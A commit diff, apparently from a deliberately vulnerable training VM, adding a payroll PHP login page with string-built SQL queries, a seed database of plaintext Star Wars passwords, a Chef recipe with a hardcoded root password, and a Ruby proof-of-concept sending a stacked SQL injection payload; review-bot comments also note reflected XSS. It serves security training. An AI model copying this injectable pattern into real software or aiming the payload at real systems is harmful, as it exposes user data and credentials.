Land #127, PHP injection in Linux VM
This commit is contained in:
commit
e221d6ec49
1
Vagrantfile
vendored
|
@ -169,6 +169,7 @@ Vagrant.configure("2") do |config|
|
|||
chef.add_recipe "metasploitable::docker"
|
||||
chef.add_recipe "metasploitable::samba"
|
||||
chef.add_recipe "metasploitable::unrealircd"
|
||||
chef.add_recipe "metasploitable::payroll_app"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
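Review bot: The run-list position of `chef.add_recipe "metasploitable::payroll_app"` is the only thing this hunk decides, and the recipe it names (added elsewhere in this commit) shells out to `/var/run/mysql-default/mysqld.sock` and drops a file into `/var/www/html`, so it must come after whatever recipes provide MySQL, Apache and a PHP build with mysqli. Those recipes are not in the visible context (only docker, samba and unrealircd are), so whether the ordering holds cannot be confirmed from the hunk; a short comment next to the added line such as `# needs mysql + php (mysqli) converged first` would make the dependency explicit for the next person who reorders the list. The enclosing `Vagrant.configure` block starts outside the hunk.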
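--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll.sql
@@ -0,0 +1,60 @@
+-- phpMyAdmin SQL Dump
+-- version 3.5.8
+-- http://www.phpmyadmin.net
+--
+-- Host: 127.0.0.1
+-- Generation Time: Apr 10, 2017 at 04:42 PM
+-- Server version: 5.5.54-0ubuntu0.14.04.1
+-- PHP Version: 5.4.5
+
+SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
+SET time_zone = "+00:00";
+
+
+/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
+/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
+/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
+/*!40101 SET NAMES utf8 */;
+
+--
+-- Database: `payroll`
+--
+
+-- --------------------------------------------------------
+
+--
+-- Table structure for table `users`
+--
+
+CREATE TABLE IF NOT EXISTS `users` (
+`username` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+`first_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+`last_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+`password` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
+`salary` int(20) NOT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
+
+--
+-- Dumping data for table `users`
+--
+
+INSERT INTO `users` (`username`, `first_name`, `last_name`, `password`, `salary`) VALUES
+('luke_skywalker', 'Luke', 'Skywalker', 'password', 102000),
+('leia_organa', 'Leia', 'Organa', 'obiwan', 95600),
+('han_solo', 'Han', 'Solo', 'sh00t-first', 12000),
+('artoo_detoo', 'Artoo', 'Detoo', 'beep_b00p', 22000),
+('c_three_pio', 'C', 'Threepio', 'pr0t0c0l', 32000),
+('ben_kenobi', 'Ben', 'Kenobi', 'thats_no_moon', 1000000),
+('darth_vader', 'Darth', 'Vader', 'd@rk_sid3', 666000),
+('anakin_skywalker', 'Anakin', 'Skywalker', 'yipp33!!', 0),
+('jarjar_binks', 'Jar-Jar', 'Binks', 'mesah_p@ssw0rd', 2000),
+('lando_calrissian', 'Lando', 'Calrissian', 'b@ckstab', 4000000),
+('boba_fett', 'Boba', 'Fett', 'mandalorian1', 2000000),
+('jabba_hutt', 'Jabba', 'The Hutt', 'not-a-slug12', 10000000),
+('greedo', 'Greedo', 'Rodian', 'hanShotFirst!', 500000),
+('chewbacca', 'Chewbacca', '', 'rwaaaaawr5', 4500),
+('kylo_ren', 'Kylo', 'Ren', 'daddy_issues1', 66600);
+
+/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
+/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
+/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;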
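Review bot: The `CREATE TABLE IF NOT EXISTS users` statement declares no PRIMARY KEY or UNIQUE constraint, so nothing stops a second row with an existing username, and a rerun of the import (the table creation is `IF NOT EXISTS` but the INSERT is unconditional) silently doubles every seed row; adding a `PRIMARY KEY (username)` clause before the closing paren keeps one row per user and makes a repeated import fail loudly instead. The dump also issues `SET NAMES utf8` (3-byte utf8 on the 5.5 server named in the header) while the columns are `utf8mb4_unicode_ci`, which is harmless for this ASCII seed data but would mangle 4-byte characters if the dump is ever regenerated with them. Since the plaintext `password` column is the point of this lab fixture, a one-line `-- passwords are stored in clear on purpose: this is the seed for the deliberately vulnerable payroll app` at the top of the dump would stop a later contributor from "fixing" it.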
@ -0,0 +1,64 @@
|
|||
<?php
|
||||
|
||||
$conn = new mysqli('127.0.0.1', 'root', 'sploitme', 'payroll');
|
||||
if ($conn->connect_error) {
|
||||
die("Connection failed: " . $conn->connect_error);
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if (!isset($_POST['s'])) {
|
||||
?>
|
||||
<center>
|
||||
<form action="" method="post">
|
||||
<h2>Payroll Login</h2>
|
||||
<table style="border-radius: 25px; border: 2px solid black; padding: 20px;">
|
||||
<tr>
|
||||
<td>User</td>
|
||||
<td><input type="text" name="user"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="password" name="password"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="OK" name="s">
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</center>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if($_POST['s']){
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['password'];
|
||||
$sql = "select username, first_name, last_name, salary from users where username = '$user' and password = '$pass'";
|
||||
|
||||
if ($conn->multi_query($sql)) {
|
||||
do {
|
||||
/* store first result set */
|
||||
echo "<center>";
|
||||
echo "<h2>Welcome, " . $user . "</h2><br>";
|
||||
echo "<table style='border-radius: 25px; border: 2px solid black;' cellspacing=30>";
|
||||
echo "<tr><th>Username</th><th>First Name</th><th>Last Name</th><th>Salary</th></tr>";
|
||||
if ($result = $conn->store_result()) {
|
||||
while ($row = $result->fetch_assoc()) {
|
||||
$keys = array_keys($row);
|
||||
echo "<tr>";
|
||||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
if (!$conn->more_results()) {
|
||||
echo "</table></center>";
|
||||
}
|
||||
} while ($conn->next_result());
|
||||
}
|
||||
}
|
||||
?>
|
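Review bot: `if($_POST['s']){` in the third PHP block reads the key without `isset`, so the same GET request that renders the form (the first block guards with `!isset($_POST['s'])`, this one does not) raises an undefined-index notice on PHP 5.4; `if (!empty($_POST['s'])) {` keeps the behaviour and removes the notice. Beyond the string-built query this page exists to demonstrate, `$user` is echoed into the `<h2>` and every result cell is echoed into `<td>` without `htmlspecialchars()`, so the page is also a reflected-XSS sink; if that second weakness is not part of the exercise, wrap those two echoes, and either way a header comment stating which weaknesses are deliberate would keep a later contributor from "fixing" the intended one. The file header for this section is not on the visible page, but the hunk (`-0,0 +1,64`) covers the whole file.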
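--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"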
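Review bot: The script has no header comment saying what it is for or what a correct run looks like; a comment such as `# Reference check for the deliberately vulnerable payroll_app.php on this VM (127.0.0.1 only); used to confirm the lab is provisioned correctly.` at the top would let a maintainer validate the box without reading the PHP. `res.body` is printed whatever the status, so a missing or misconfigured app and a working one produce the same "Done"; `abort "Unexpected HTTP #{res.code}" unless res.is_a?(Net::HTTPSuccess)` before the body line separates the two cases. Quoting is mixed (`"http://..."` on one line, `'luke_skywalker'` on the next); single quotes where there is no interpolation would match the file's other literals.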
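--- /dev/null
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@@ -0,0 +1,32 @@
+#
+# Cookbook:: metasploitable
+# Recipe:: payroll_app
+# Copyright:: 2017, Rapid7, All Rights Reserved.
+
+cookbook_file '/var/www/html/payroll_app.php' do
+source 'payroll_app/payroll_app.php'
+mode '0755'
+end
+
+cookbook_file '/tmp/payroll.sql' do
+source 'payroll_app/payroll.sql'
+mode '0755'
+end
+
+directory '/home/vagrant/poc/payroll_app/' do
+mode '0755'
+owner 'vagrant'
+recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+source 'payroll_app/poc.rb'
+mode '0755'
+end
+
+bash 'create payroll database and import data' do
+code <<-EOH
+mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
+mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" payroll < /tmp/payroll.sql
+EOH
+end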
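Review bot: The `bash 'create payroll database and import data'` resource is not idempotent: on a second chef-client run `CREATE DATABASE payroll;` fails because the database already exists, which fails the converge, and if that line were made tolerant the unconditional import would re-insert every seed row into a table with no key. Changing it to `--execute="CREATE DATABASE IF NOT EXISTS payroll;"` and guarding the resource with `not_if 'mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" -e "use payroll"'` makes reruns a no-op. `mode '0755'` on `/var/www/html/payroll_app.php` and `/tmp/payroll.sql` marks a PHP source file and a SQL dump executable for no reason; `mode '0644'` is all Apache and the mysql client need to read them. The root password on the mysql command line is visible in the process list during the converge, which is an accepted trade-off on a lab VM but worth a one-line comment so it is a known choice rather than an oversight.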
@ -35,7 +35,7 @@ end
|
|||
bash "compile and install php" do
|
||||
code <<-EOH
|
||||
cd /home/vagrant/php-5.4.5
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysql
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysqli --enable-embedded-mysqli
|
||||
make
|
||||
make install
|
||||
EOH
|
||||
|
|